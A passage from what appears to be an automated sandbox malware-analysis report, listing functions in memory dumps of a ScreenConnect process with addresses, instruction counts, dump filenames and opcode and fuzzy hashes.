Instruction ID: 71a50f27e8ade79103883fb5f8cf184fc0d520bbfc328da07024ea07316130f8
Opcode Fuzzy Hash: 11827ef591e51a9c97d367efbeb7206cca277b018a30fd80cf348996bd419df8
Instruction Fuzzy Hash: 44012C7A3041109F8708EAADF49496EB3AAFBDD265354853BE509C7355CA32AC038764

Function 01F691B8 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98745470a1f1d3c006e7df24ff561096c6907225dff6a5ce56db29c16c59189c
Instruction ID: 603a84f6bdae6389b1314a70f2e69d516d2b521c224cdf1d7acdc91371a0bef3
Opcode Fuzzy Hash: 98745470a1f1d3c006e7df24ff561096c6907225dff6a5ce56db29c16c59189c
Instruction Fuzzy Hash: 031161B1E40209AFDB14CA6DC800AABB7FAFFC4314F14C566D614D7254E7B29A02CB91

Function 01F6CBC0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b4dfb87311e56d2fa838c3e238cdf175c062ee687ca76745782a16f2a75d280
Instruction ID: 59855100f8f320fceb44e687e65af74c666cbf166b009fdb30db893da837cf7f
Opcode Fuzzy Hash: 0b4dfb87311e56d2fa838c3e238cdf175c062ee687ca76745782a16f2a75d280
Instruction Fuzzy Hash: 291115B1E0021D9FDF14DBA9D860AEDBBB5EF89310F000469D046BB3A0DB792D44CBA1

Function 01F6F9E0 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39c43b5fa80a185955b4ab32afb5e2ffc2b32c2cdd1c95bc8d731c7caf25777f
Instruction ID: dfe3507248d8f39f00597462cc7b645457f7d7a9de53605d707e4cb28efff713
Opcode Fuzzy Hash: 39c43b5fa80a185955b4ab32afb5e2ffc2b32c2cdd1c95bc8d731c7caf25777f
Instruction Fuzzy Hash: 2D012D71709390AFC7139B7DAD6055A7FB9EF876103088497E554CB263DA21AC04CBA1

Function 01F68AB0 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efe7bf51ddc75f3c3a84aa8d0e829d007ec1e79d789894cf2ff823749359ccfd
Instruction ID: c1c9cef96a9c69baee148b67d57e76f2ee1f449fe34b1c1c0aae6398c1d28e4b
Opcode Fuzzy Hash: efe7bf51ddc75f3c3a84aa8d0e829d007ec1e79d789894cf2ff823749359ccfd
Instruction Fuzzy Hash: B111127690020A9FCF00DFA8D9809DEBBF5FF49314B508569D609BB251D771BE0ACB91

Function 018BD006 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932157013.00000000018BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_18bd000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cc0b9704a6907f3052226255fe8ac7292b229c3d71ba8d4efd32ee2818a72bd
Instruction ID: 0e6404daeb8cdcd27966f70aace82afae65ee59ef799d6e342c599d76b355fbb
Opcode Fuzzy Hash: 8cc0b9704a6907f3052226255fe8ac7292b229c3d71ba8d4efd32ee2818a72bd
Instruction Fuzzy Hash: B4016D7100D380AFD7134B298C84652BFA4EF57224F1985CBE988CF2A3C2695C45C772

Function 01F6CBB0 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8858aef28b66ad30b4ce3a42045159532f2334f1c7f320cd27375226cde029a8
Instruction ID: d751f52b6bcd77c776c0b08628abccaf5307a72d5d6e5a82ffc72e3a8c3ab5f5
Opcode Fuzzy Hash: 8858aef28b66ad30b4ce3a42045159532f2334f1c7f320cd27375226cde029a8
Instruction Fuzzy Hash: 2F110C71E002198FEF18DBA8D451ADDBBB2AB49310F104469D042BB3A0DE796D45CBA5

Function 01F6A9C8 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 842f45c046165109616a5cf4e5919332dd629c6564ec4fa6eacc20886e3b801e
Instruction ID: 4a4e789bbebb0bf80605569b7d692fc565539406e00c4b73c471c3c5ebdb9a0d
Opcode Fuzzy Hash: 842f45c046165109616a5cf4e5919332dd629c6564ec4fa6eacc20886e3b801e
Instruction Fuzzy Hash: 65014E72F043219B8B199E5D981005FB7DDFBC82103144A6AD406DB305EF72DC028FC0

Function 018BD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932157013.00000000018BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_18bd000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: acce195b3142bd84966458318d2f5d0794fbdb4a72b3d06374fe6a17bab69b1e
Instruction ID: 86d84eee6ce1e2e85493db6ea9be475cb58b49e0c0debb8eee5c01cf262c7fb1
Opcode Fuzzy Hash: acce195b3142bd84966458318d2f5d0794fbdb4a72b3d06374fe6a17bab69b1e
Instruction Fuzzy Hash: 1701F771004344AAE7218A59CCC4BA6BFD8EF553A9F08C619ED0D8B383C2799942C6B1

Function 01F68B95 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: effe8712caba1c5e43a4c9ffbf15a214f47cc3dd3c3bf275f0f55ded9c79dc72
Instruction ID: aec4d17e68543cf965813db98841de3a6c877e7d1cb2ef4b50aacc09459f9ac1
Opcode Fuzzy Hash: effe8712caba1c5e43a4c9ffbf15a214f47cc3dd3c3bf275f0f55ded9c79dc72
Instruction Fuzzy Hash: 33015A72A0021EDFCB05DBA8D4449ECBFB2FF45355B48C558E009AB115C732ED46CB50

Function 01F68B40 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8d42a5b9dc1d79fc4beef04659d70011ba76912f8fa1ca1beaf2c82cacab6ba
Instruction ID: f98abc7ed17f08783b84cf0991f9e973e08273a4ee7704f8d3fd29949ed90705
Opcode Fuzzy Hash: a8d42a5b9dc1d79fc4beef04659d70011ba76912f8fa1ca1beaf2c82cacab6ba
Instruction Fuzzy Hash: 5601E832D0025A9BCB04DFA9D8448CDBBB6FF89324F45856AE505B7250DB31791ACBA1

Function 01F6F630 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a7382b5b394c23ff22735eef957169f8b8c4f9349599d88191845532c44c396
Instruction ID: 825a3ba187fe615add3360ddf2ff51c8319b0b1e05cd3b8af319fb28154a9e37
Opcode Fuzzy Hash: 7a7382b5b394c23ff22735eef957169f8b8c4f9349599d88191845532c44c396
Instruction Fuzzy Hash: 48F02B773042156FDF069FA8E8505DE3BBBFB88360B04402AEA09D7251DB329D16C7A5

Function 01F6BCC8 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f25e8c365392919d0f4bac14f606ea745a24530102014cacc6f5f92a3d6dba49
Instruction ID: 8eba12f127bc654e5fa960e86133c6625357c3e174a9a776f3f1a31664d3a7a6
Opcode Fuzzy Hash: f25e8c365392919d0f4bac14f606ea745a24530102014cacc6f5f92a3d6dba49
Instruction Fuzzy Hash: EFF05836B092149ED728CABEA40069BBBDECBC4624B14807FE58DC3640E832A4018765

Function 01F6EB91 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5779d22dd74ab51f046e4ff1cf0baac4d0a61b30583ce965514ae20ae23650c9
Instruction ID: 3941109753150e9c75f7d8a699d3318069bdc0c4163d6076f6d74413b6ff2f46
Opcode Fuzzy Hash: 5779d22dd74ab51f046e4ff1cf0baac4d0a61b30583ce965514ae20ae23650c9
Instruction Fuzzy Hash: 6DF0B477B042486FDB05CA0AD800D5ABFAAEF95220B18C16BE848CB242D531D9128764

Function 01F6F640 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4c07383ea9f0361d2881e12b5713f2e8b1a354635ce53cfa2a5c652117d7be2
Instruction ID: 93f3924bebf62fc5c82a12c21658c8242ba7b1e8c4d47d122dffe067d00a2366
Opcode Fuzzy Hash: e4c07383ea9f0361d2881e12b5713f2e8b1a354635ce53cfa2a5c652117d7be2
Instruction Fuzzy Hash: 0CF082763002197B9F059E98AC409EF3BAFEBC8360B004029FA09D3350DB729D159BA5

Function 01F6E260 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a47ddc847d7b02557590cf4ef6075c658f79b31e8e453652a0920e9303176ef3
Instruction ID: eda82b52de0165bb92d42191ddd182cb47113ec67a9f18ba08dca02539e89861
Opcode Fuzzy Hash: a47ddc847d7b02557590cf4ef6075c658f79b31e8e453652a0920e9303176ef3
Instruction Fuzzy Hash: 35F0F975A002599FCB41DFADD4816DDFFF1EB89220714C259E915AB251E731AA03CB80

Function 01F6329C Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f4287b9eaaa51d0c3e4fafcbcbb3f7ae5c9aee18ba4393d38eddf73819a779c
Instruction ID: ff3d2b62b5190d48219d48fd8e0aa2a4b920dae0e450071e09f9593b8ade6556
Opcode Fuzzy Hash: 4f4287b9eaaa51d0c3e4fafcbcbb3f7ae5c9aee18ba4393d38eddf73819a779c
Instruction Fuzzy Hash: 2BF02B6250D3900FD312D77CBC511D93FE0FEE221574809CBE085CB556D656AA0BC391

Function 01F6FA08 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d01af54296f9ae980b71b2b87b8d2b8dce2967dcc44c7ac35473ffa0adbb8e0
Instruction ID: 2b2b6d95a172181803e045b631f7287ef3f3c4c64a9cb5b77bcbedb0b733c943
Opcode Fuzzy Hash: 1d01af54296f9ae980b71b2b87b8d2b8dce2967dcc44c7ac35473ffa0adbb8e0
Instruction Fuzzy Hash: 91F0AE71700711AB8716AA9FB85095F7BDEEFC8A513048429E529C7315EF61FC054BE0

Function 01F6AA48 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5872f6fcbc8f7aa35d18f0e3ebc776fcf57aca5a903c2bf50bc91fee78120910
Instruction ID: 012fc5857d1b2ae8389cecddbafa58dceaf182d45271df7f7ddcbf2e29b187ff
Opcode Fuzzy Hash: 5872f6fcbc8f7aa35d18f0e3ebc776fcf57aca5a903c2bf50bc91fee78120910
Instruction Fuzzy Hash: 0BF0E5327047506BD7141EAEB4D815E7FEAEBC9AA5714407EDA09C7342DD268C0B8751

Function 01F631E0 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 943a75181f0970e66840192b60a1459fefd778f333aebed211972859458f85ad
Instruction ID: 124605e698229497ba025e3509d818d368251f703f7b711bb19829bfe68194c6
Opcode Fuzzy Hash: 943a75181f0970e66840192b60a1459fefd778f333aebed211972859458f85ad
Instruction Fuzzy Hash: A0F04974D05248EFCB05EFA8E9812DCBBB0FB00201F5040A9C509E7651D7322F85DB52

Function 01F631F0 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcb3bf7c6d595a0d8e4ee8d17db4f7d1ffbd91d4801a15d8e9f1e2604c3e14bb
Instruction ID: 98563fafc7b970c4d1bcd50cb0d0626936b438ea3a97613daa5f8448dc5faae5
Opcode Fuzzy Hash: dcb3bf7c6d595a0d8e4ee8d17db4f7d1ffbd91d4801a15d8e9f1e2604c3e14bb
Instruction Fuzzy Hash: A7F0E274E00208EFDB04EFA8D98569CBBF5FB44245F6044A8D909A7254DB326E84DB52

Function 01F6BCB9 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbd742c03abb7fde6091a0bc8597d5857eb85cfc3e3ab926e26eb2cf49485565
Instruction ID: 5c6f89a770d7890c8bd7704ea314e840645c0024a2e04d1adab7c61ce0885c35
Opcode Fuzzy Hash: fbd742c03abb7fde6091a0bc8597d5857eb85cfc3e3ab926e26eb2cf49485565
Instruction Fuzzy Hash: 4BF0A032A0E3949ED7168FB9581059A7FE98F86114718C0AFD48CC7142E8309902C766

Function 01F6E2AA Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 864bcf8bb0e900e53b3c7fd89f55c87279c435194300a88469d72119913c3840
Instruction ID: 1ef1a3ad6312b592a1b7a4452c8dcf8afe67044f116d4062b9ac6fe46d8c2401
Opcode Fuzzy Hash: 864bcf8bb0e900e53b3c7fd89f55c87279c435194300a88469d72119913c3840
Instruction Fuzzy Hash: B6F03A75B005258FDB55DF6DC454AAABBE6EF88350B048069E909CB354EB35DE01CB80

Function 01F6EBA0 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be088bb43b4bd9f922dad7b516baeb1a567bd390102560c1b1c479a680ca933a
Instruction ID: 1277153409eaf0b6f3cf0ed8c44473f6d17fd7459454e7d96675f8d7363aa04d
Opcode Fuzzy Hash: be088bb43b4bd9f922dad7b516baeb1a567bd390102560c1b1c479a680ca933a
Instruction Fuzzy Hash: 0CE0657AB042186F4B04CA4ED800D6FBBAEDFC9220718C026F809C7305D932DD1187A4

Function 01F61229 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 033124ad39bb4aef8f9d5a8f35a343bb2f4dcd055e741baef092849ac0fea7f7
Instruction ID: ea496a4d7e588f71a85fbf66376ef46c5cfa5191037ef43386dfd73b9e4da70a
Opcode Fuzzy Hash: 033124ad39bb4aef8f9d5a8f35a343bb2f4dcd055e741baef092849ac0fea7f7
Instruction Fuzzy Hash: 79F0A0722043105BC3116B79A40908E3F9AFFD2756754896FE609CB309EE72DE0A4BE1

Function 01F65920 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6fbf6463ecf27306d3895bfb1d00a39c9f82b427c56cc1be72e272011ddf656
Instruction ID: 6e7df1d83f080bed3dadf08a0aa04740069d3ea3e505b2abd56ce6697f4d5af9
Opcode Fuzzy Hash: b6fbf6463ecf27306d3895bfb1d00a39c9f82b427c56cc1be72e272011ddf656
Instruction Fuzzy Hash: 7FE0ED323022101BC3006A7CB8680DD7FAAFFDE2223040167E506C3381CE25AE0BD392

Function 01F652E8 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc030c35942b876c1acbeaec5ec57fe104099a3fb64d89354eb01d1adfcf54ca
Instruction ID: dbb13c91756528f832c94ecddd04800c16eddc5053651250014ef7f7aef4555b
Opcode Fuzzy Hash: cc030c35942b876c1acbeaec5ec57fe104099a3fb64d89354eb01d1adfcf54ca
Instruction Fuzzy Hash: 42E022B2D083043BCB09ABADA8514DDBFB8EF86220B0400ABD048D7252EC325A468396

Function 01F6E270 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d41637b78cfbde1b371b1effe58ee0f78fb51a8d34a3a56ff78bebeb1c2d5d84
Instruction ID: 2bebb132d4bf6f7b5253a3e14a4c50371a2cbc0646a655dd991a384bc5662317
Opcode Fuzzy Hash: d41637b78cfbde1b371b1effe58ee0f78fb51a8d34a3a56ff78bebeb1c2d5d84
Instruction Fuzzy Hash: 5FF0B271E002199F8B40DFADC84169EFBF5EF49200B20816AD918EB211E331AA12CB80

Function 01F6AA58 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3574c9665b505d8c12c4faaf5bbeb4a983e983af7185e405e302ad4902a5559
Instruction ID: f6e64ae16796959bb13df9d6e7982d38e49d017c6a5b76d9d8014155fd1731c8
Opcode Fuzzy Hash: b3574c9665b505d8c12c4faaf5bbeb4a983e983af7185e405e302ad4902a5559
Instruction Fuzzy Hash: 39E02631300710AB97242AAF749842EBBDFEBC8AA1754003EE60AC3300DE7ADC0A4791

Function 01F61238 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0baa1eb5c031042b9defbfa6ae98ff169346ef654c4696bc83071290aa55821d
Instruction ID: 6537456527b6feb33cb3f390d32f7397083d5fdee2233e97047fdb661a5f5d0b
Opcode Fuzzy Hash: 0baa1eb5c031042b9defbfa6ae98ff169346ef654c4696bc83071290aa55821d
Instruction Fuzzy Hash: 45E048322006105B8315676DA40549E779AFFD6752754892FE60ACB304DE72EE4A4FD1

Function 01F6F950 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ba31ef9d90be065e38fa78f137b6895d267385b4b802a56f3e344a4f3169def
Instruction ID: d245a81fb94287609294664224edcb69afb3be292da115b8d04aff1b5aaac3b7
Opcode Fuzzy Hash: 1ba31ef9d90be065e38fa78f137b6895d267385b4b802a56f3e344a4f3169def
Instruction Fuzzy Hash: CDE026323012012BC308A56AE880957B3AEEBCC764B100479D10CC7319CD729C8382A0

Function 01F6F94F Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25def29cd89c20ef0e7ff5f19cf3de2f47cff051540198a551172e9f9208a027
Instruction ID: 590e56b012a3daced6d926b73f912854e44aa09cd298f8db334a61943014968d
Opcode Fuzzy Hash: 25def29cd89c20ef0e7ff5f19cf3de2f47cff051540198a551172e9f9208a027
Instruction Fuzzy Hash: C4E086327016016FC718A66AE8909ABB3BAEBDD764B20447ED50DD7359CE768C83C750

Function 01F63257 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe92d6516c63d95a56ae1b1fc7097dcad4702f683255274bf23a72fc667e0b88
Instruction ID: a17f5fa0d049eca5d9c0a8f08f87d647e31f5d0b142ae60ed55bf7a142736b57
Opcode Fuzzy Hash: fe92d6516c63d95a56ae1b1fc7097dcad4702f683255274bf23a72fc667e0b88
Instruction Fuzzy Hash: 4CE022212093D10FC722D768F8405CD3FE1AFD2200B0809DAE04097107CB66AB4B83D1

Function 01F65930 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb95b169b81395d91d0d65b5d16a670815a95fde054041a2a8cb8ef9df452833
Instruction ID: 842b039ceacd30d0f82ff9164d11e33c240a6f06fbc40cf9d5d775bec0a878a3
Opcode Fuzzy Hash: eb95b169b81395d91d0d65b5d16a670815a95fde054041a2a8cb8ef9df452833
Instruction Fuzzy Hash: 7BE0C2363012106B8304677DE80886E7BDAFFDD2313104126E90AC3384CE34EC0AE7A7

Function 01F65979 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1e1309cceb7a852dd12781c6a91868a65cce047511085219a9f4094d4b36eab
Instruction ID: 049367c87357dba2c987182ec748f8e904cf8fe58aa0a427dec4acb55b334bf7
Opcode Fuzzy Hash: f1e1309cceb7a852dd12781c6a91868a65cce047511085219a9f4094d4b36eab
Instruction Fuzzy Hash: EDE0D875D052449FC740DFB8EA515CCB7B0FF05304710899EC408D7211E7315F069B41

Function 01F6AFE5 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c06fc9ce23dda67f17021e6119a1f68cfc830ef4608b09b5060e89b60852f3b
Instruction ID: 21e345302dd0fbd8e2283d3e42a0afc5debac06952fc37c72cf93c9f5307ff2c
Opcode Fuzzy Hash: 4c06fc9ce23dda67f17021e6119a1f68cfc830ef4608b09b5060e89b60852f3b
Instruction Fuzzy Hash: 23E0467090D381AFC342AF38A914149BFF0BE06204B0648AED8C9C7252E235AD0ACB62

Function 01F6BC81 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c624b8d5a2a2efc4d866ff43bd8b3095b2d2ddc3c61fc4959e7b7418c182af5
Instruction ID: a2ea19bc1821d0f1132718cb2f0e225cd2a8e551f48afcccb342bba0dce1a054
Opcode Fuzzy Hash: 8c624b8d5a2a2efc4d866ff43bd8b3095b2d2ddc3c61fc4959e7b7418c182af5
Instruction Fuzzy Hash: 51E01A31959385DFC741EF38E648159BBF0AF46200B49889ED889C7201E630A949DB52

Function 01F6ED28 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
